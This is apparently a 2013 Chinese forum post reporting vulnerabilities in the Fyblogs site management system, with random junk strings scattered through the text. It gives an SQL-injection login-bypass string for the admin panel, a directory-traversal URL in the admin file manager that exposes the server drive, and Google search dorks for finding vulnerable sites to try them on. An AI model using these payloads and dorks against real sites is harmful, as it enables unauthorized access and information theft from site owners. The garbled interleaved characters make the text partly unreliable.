漏洞类型: 未授权访问/权限绕过
) W+ o) t' O1 S$ B2 o! l
, C9 f! c, W3 X- ?. P简要描述:
) @! w$ O* Z# a8 P# P8 V' G9 t# D! Y" L3 V% d1 [9 [6 W
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
3 t! P4 q( L2 f4 q! [# s4 |+ g
$ E+ x; G& ~- B详细说明:
5 j% U* I5 d- K' s9 j8 w# i" _$ u4 X7 J
后台万能密码 'or'='or'
5 {& J7 H2 b; I0 z/ X后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!3 T" S3 X" N$ B- Z% A- L: \+ Z
admin/uploadfile.asp?currentFolder=/upfiles/../0 c% z- I& Y q, E$ U
& b- L2 \/ D! v1 ?* W2 B& t) x
漏洞证明:* H& F; u% d1 f' O
8 _, O6 x* ?1 D$ H
谷歌:inurl:type.asp?id=1 新闻中心8 Q9 k% Z' b$ D1 K& m
或者 :inurl:download_ok.asp?, }4 ~5 `/ l4 s! r/ p) \
' `0 y9 P2 H/ s6 b& h$ E* F9 t5 W
可以测试
, z- M& A9 n* t$ ^( e0 a$ L8 |' p2 b7 W8 ~
7 C4 G, [; @) V: ]4 C* t7 m |
发表于 2013-3-7 13:07:46
收藏
支持
反对